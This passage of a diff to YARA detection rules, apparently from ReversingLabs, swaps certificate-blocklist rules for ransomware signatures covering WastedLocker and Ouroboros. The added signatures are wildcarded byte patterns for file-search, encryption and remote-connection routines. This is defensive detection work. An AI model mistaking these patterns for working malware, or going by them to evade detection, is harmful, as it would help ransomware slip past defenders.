+            ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 F6 0F 8E ?? ?? ?? ?? 33
+        }
+		$encrypt_files_p2 = {
+            FF 8D 49 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 33 F6 8D 51 ?? EB ?? 8D 49 ?? 8A 01 41 84 C0 75 ?? 2B CA 74 ?? BB ?? ?? ?? ??
+            8A 84 35 ?? ?? ?? ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? EB
+            ?? 3C ?? 7C ?? 3C ?? 7F ?? 0F BE C0 83 E8 ?? 99 F7 FB 80 C2 ?? 88 94 35 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ?? 8B 9D ?? ?? ??
+            ?? 6A ?? 6A ?? 57 53 FF 15 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8D 9B ?? ?? ?? ??
+            8A 01 41 84 C0 75 ?? 6A ?? 8D 85 ?? ?? ?? ?? 2B CA 50 51 8D 85 ?? ?? ?? ?? 50 53 FF
+            15 ?? ?? ?? ?? 03 BD ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 3B BD ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 53 FF 15 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ??
+            5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fan Li" and pe.signatures [ i ] . serial == "62:1e:d8:26:5b:0a:d8:72:d9:f4:b4:ed:6d:56:05:13" and 1413183357 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_56E22B992B4C7F1Afeac1D63B492Bf54 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Wastedlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects WastedLocker ransomware."
 		author = "ReversingLabs"
-		id = "28609e75-47cb-5017-bb92-046a9e8931c6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "68090960-9878-5836-8caa-bf8f408a474e"
+		date = "2020-12-07"
+		modified = "2020-12-07"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1672-L1688"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ef058c0ec352260fa3db0fc74331d1da3c9eb8d161cef7635632fd7c569198c6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Wastedlocker.yara#L1-L86"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0899d3cc3bcea8eae60689a54f34e57bdc52088c879c8420b8e6d0b1969cb186"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "WastedLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 83 65 ?? ?? 57 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 53 8B 5D ?? 8D 04 41 89 45 ??
+            C7 00 ?? ?? ?? ?? 8B 43 ?? 57 51 89 45 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 0F 84
+            ?? ?? ?? ?? 56 8D 47 ?? 66 83 38 ?? 75 ?? 0F B7 4F ?? 66 85 C9 0F 84 ?? ?? ?? ?? 66
+            83 F9 ?? 75 ?? 66 83 7F ?? ?? 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F0
+            8D 14 0E B8 ?? ?? ?? ?? 3B D0 89 55 ?? 0F 83 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ??
+            8B 45 ?? 85 C0 74 ?? 83 7F ?? ?? 75 ?? 39 47 ?? 0F 82 ?? ?? ?? ?? 8D 44 36 ?? 50 8D
+            47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50
+            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 E8
+            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 03 C6 8D 44 00 ?? 83 C0 ?? 50 6A ?? FF
+            35 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 6A
+            ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 8D 44 00 ?? 50 FF 75 ?? 8D 46 ?? 50 89 76 ?? 89 36 E8
+            ?? ?? ?? ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 07 89 46 ?? 8B 47 ?? 89 46 ?? 8B
+        }
+		$find_files_p2 = {
+            47 ?? 89 46 ?? 8B 47 ?? 89 46 ?? 8B 47 ?? 83 C4 ?? 89 46 ?? 83 3B ?? 74 ?? 53 FF 15
+            ?? ?? ?? ?? 8D 43 ?? 8B 48 ?? 89 06 89 4E ?? 89 31 89 70 ?? FF 43 ?? 83 7B ?? ?? 74
+            ?? 8B 43 ?? 83 F8 ?? 75 ?? FF 73 ?? FF 15 ?? ?? ?? ?? 83 3B ?? 0F 84 ?? ?? ?? ?? 53
+            FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? F6 45 ?? ?? 74 ?? 8D 4C 0E ?? 3B
+            C8 73 ?? 8D 04 36 50 8D 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 8D 04 41
+            66 83 60 ?? ?? 83 C4 ?? 83 7D ?? ?? 66 C7 00 ?? ?? 74 ?? 83 C1 ?? 51 8B 4D ?? E8 ??
+            ?? ?? ?? 85 C0 75 ?? 8B 4D ?? FF 75 ?? 8B 45 ?? 53 FF 75 ?? 8D 44 06 ?? FF 75 ?? 50
+            51 E8 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? F6 45 ?? ??
+            74 ?? 83 65 ?? ?? 83 7D ?? ?? 75 ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 43
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5B EB
+            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 5F C9 C2
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 8B 3D ?? ?? ?? ?? FF 75 ?? FF D7 85 C0
+            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 75 ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? F6 C3 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 75 ?? 33 DB 85 DB 89 5D ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ??
+            ?? ?? ?? 89 45 ?? EB ?? 83 65 ?? ?? 33 C9 39 4D ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 39 4D ?? 74 ?? 8B 45 ?? 8B 10 8B 40 ?? C1 65 ?? ?? 89 55 ?? 89 45
+            ?? EB ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 4D ?? 8B 45 ?? 89 45 ?? 89 4D ?? 89 4D ??
+            8B 5D ?? 33 F6 8B 45 ?? 85 C0 89 45 ?? 74 ?? 3B D8 73 ?? 89 5D ?? 2B 45 ?? 89 45 ??
+            75 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 7D ?? 8D 45 ?? 50 57 8D 47 ?? 50 FF 75
+            ?? 8B 45 ?? 03 C6 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 03 75 ?? 85 C0 89 45 ?? 0F
+        }
+		$encrypt_files_p2 = {
+            85 ?? ?? ?? ?? 2B 5D ?? 75 ?? EB ?? 8B 7D ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 33
+            C0 3B 45 ?? 77 ?? 72 ?? 3B 5D ?? 73 ?? 8B C3 EB ?? 8B 45 ?? 29 45 ?? 8B 4D ?? 83 5D
+            ?? ?? 0B 4D ?? 75 ?? 8B 4D ?? 89 4D ?? 03 F0 2B D8 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 4D
+            ?? 0F AC C8 ?? C1 E9 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? F7 E1 29 45 ?? 19 55 ?? 01 45 ??
+            11 55 ?? 83 7D ?? ?? 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 85 C0 89 45 ?? 0F 84 ?? ?? ?? ??
+            8B 7D ?? 8D 47 ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 74 ?? 83 7D ??
+            ?? 74 ?? 8B 4D ?? 8B 45 ?? 8B D1 0B D0 74 ?? 0F AC C1 ?? C1 E8 ?? 83 4F ?? ?? 89 4F
+            ?? 89 75 ?? 39 75 ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39
+            75 ?? 74 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 85 DB 0F 85
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 01 75 ?? 83 55 ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
+            D7 EB ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 5F 5E 5B C9 C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Hetem Ramadani" and pe.signatures [ i ] . serial == "56:e2:2b:99:2b:4c:7f:1a:fe:ac:1d:63:b4:92:bf:54" and 1435622399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3Bc3Bae4118D46F3Fdd9Beeeab749Fee : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ouroboros : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ouroboros ransomware."
 		author = "ReversingLabs"
-		id = "0d2f1f5f-119a-5069-abcb-e4e93d9964c3"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "af0b9311-a7dd-56e8-a004-0828af5af5ef"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L1690-L1706"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fcbda27f8bf4dca8aa32103bb344380c82f0c701c25766df94c182ef94805a12"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ouroboros.yara#L1-L175"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b573f303318452010ff46f21a02b6290820f9a27bf4c51b72f6ed15263b5f433"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ouroboros"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 75 ?? 8D 8D ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ??
+            42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ??
+            ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
+        }
+		$remote_connection_p2 = {
+            C6 45 ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49
+            ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8B
+            95 ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? FF 75 ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 75 ?? 8D 8D ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 45 ?? C6 85 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 50 8B CE C7 06 ?? ?? ?? ?? C6 46 ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 FA ??
+            72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83
+        }
+		$remote_connection_p3 = {
+            F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF
+            75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83
+            FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0
+            ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ??
+            ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87
+            ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 85 C9 74 ?? 8B 95 ?? ?? ??
+            ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F
+            87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_p4 = {
+            8B 55 ?? C7 06 ?? ?? ?? ?? C6 46 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ??
+            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? FF
+            70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 83 C4
+            ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1
+            83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA
+            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ??
+            ?? FF 70 ?? 8D 45 ?? 50 8B C8 E8 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 83 C4 ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ??
+            8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 8D
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ??
+            ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C1 2B D1 81 FA ?? ?? ?? ?? 0F
+            82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? E8
+        }
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
+            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
+            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
+            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
+            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
+            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
+            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
+            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
+            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
+            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9
+        }
+		$encrypt_files_p1 = {
+            83 EC ?? 8B 44 24 ?? 53 55 56 8B F1 89 44 24 ?? 57 8B 7C 24 ?? 8B 6E ?? 3B FD 77 ??
+            8B DE 83 FD ?? 72 ?? 8B 1E 57 50 53 89 7E ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 04 1F ?? 8B
+            C6 5F 5E 5D 5B 83 C4 ?? C2 ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B DF 83 CB ??
+            81 FB ?? ?? ?? ?? 76 ?? BB ?? ?? ?? ?? EB ?? 8B CD B8 ?? ?? ?? ?? D1 E9 2B C1 3B E8
+            76 ?? BB ?? ?? ?? ?? EB ?? 8D 04 29 3B D8 0F 42 D8 33 C9 8B C3 83 C0 ?? 0F 92 C1 F7
+            D9 0B C8 51 8B CE E8 ?? ?? ?? ?? 57 FF 74 24 ?? 89 44 24 ?? 50 89 7E ?? 89 5E ?? E8
+            ?? ?? ?? ?? 8B 5C 24 ?? 83 C4 ?? C6 04 1F ?? 83 FD ?? 72 ?? 8B 06 45 81 FD ?? ?? ??
+            ?? 72 ?? 8B 48 ?? 83 C5 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 8B C1 55 50 E8 ?? ?? ?? ??
+            83 C4 ?? 5F 89 1E 8B C6 5E 5D 5B 83 C4 ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC
+            CC CC CC CC 83 EC ?? 53 55 8B 6C 24 ?? 56 57 8B F9 8B 4C 24 ?? 89 4C 24 ?? 8B 5F ??
+            3B EB 77 ?? 89 7C 24 ?? 8B C7 83 FB ?? 72 ?? 8B 07 89 44 24 ?? 8D 34 6D
+        }
+		$encrypt_files_p2 = {
+            89 6F ?? 56 51 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 33 C9 66 89 0C 06 8B C7 5F 5E
+            5D 5B 83 C4 ?? C2 ?? ?? 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F5 83 CE ?? 81 FE ??
+            ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B CB B8 ?? ?? ?? ?? D1 E9 2B C1 3B D8 76 ?? BE
+            ?? ?? ?? ?? EB ?? 8D 04 19 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8
+            51 8B CF E8 ?? ?? ?? ?? 89 77 ?? 8D 34 6D ?? ?? ?? ?? 56 FF 74 24 ?? 89 44 24 ?? 50
+            89 6F ?? E8 ?? ?? ?? ?? 8B 6C 24 ?? 33 C0 83 C4 ?? 66 89 04 2E 83 FB ?? 72 ?? 8B 07
+            8D 1C 5D ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 72 ?? 8B 48 ?? 83 C3 ?? 2B C1 83 C0 ?? 83 F8
+            ?? 77 ?? 8B C1 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 2F 8B C7 5F 5E 5D 5B 83 C4 ?? C2 ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 8B 44 24 ?? 83 EC ?? 83 E0 ?? 89 41 ?? 8B 49 ??
+            23 C8 75 ?? 83 C4 ?? C2 ?? ?? 56 F6 C1 ?? 74 ?? BE ?? ?? ?? ?? EB ?? F6 C1 ?? BE ??
+            ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 F0 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C
